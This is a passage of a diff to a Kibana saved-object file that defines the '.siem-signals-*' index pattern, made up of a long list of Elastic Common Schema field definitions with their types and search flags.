,\"name\":\"url.fragment\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"url.full\"}}},{\"count\":0,\"name\":\"url.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.original.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"url.original\"}}},{\"count\":0,\"name\":\"url.password\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.query\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.scheme\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.username\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user.full_name\"}}},{\"count\":0,\"name\":\"user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user.name\"}}},{\"count\":0,\"name\":\"user_agent.device.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.original.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user_agent.original\"}}},{\"count\":0,\"name\":\"user_agent.os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user_agent.os.full\"}}},{\"count\":0,\"name\":\"user_agent.os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user_agent.os.name\"}}},{\"count\":0,\"name\":\"user_agent.os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.classification\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.description.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"vulnerability.description\"}}},{\"count\":0,\"name\":\"vulnerability.enumeration\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.report_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.scanner.vendor\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.score.base\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.score.environmental\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.score.temporal\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.score.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.severity\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true}]", "timeFieldName": "@timestamp", "title": ".siem-signals-*"}, "coreMigrationVersion": "7.16.3", "id": "195a3f00-d04f-11ea-9301-a30a04251ae9", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642171872765, 241], "type": "index-pattern", "version": "1"} \ No newline at end of file +{"attributes": {"fields": "[{\"count\":0,\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_score\",\"type\":\"number\",\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"agent.ephemeral_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"as.organization.name\"}}},{\"count\":0,\"name\":\"client.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"client.as.organization.name\"}}},{\"count\":0,\"name\":\"client.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.nat.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.nat.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"client.user.full_name\"}}},{\"count\":0,\"name\":\"client.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"client.user.name\"}}},{\"count\":0,\"name\":\"cloud.account.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.availability_zone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.instance.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.instance.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.machine.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.provider\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.region\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.image.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.image.tag\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.runtime\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"destination.as.organization.name\"}}},{\"count\":0,\"name\":\"destination.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.nat.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.nat.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"destination.user.full_name\"}}},{\"count\":0,\"name\":\"destination.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"destination.user.name\"}}},{\"count\":0,\"name\":\"dll.code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.hash.md5\",\"type\":\"string\",\"esTypes\":[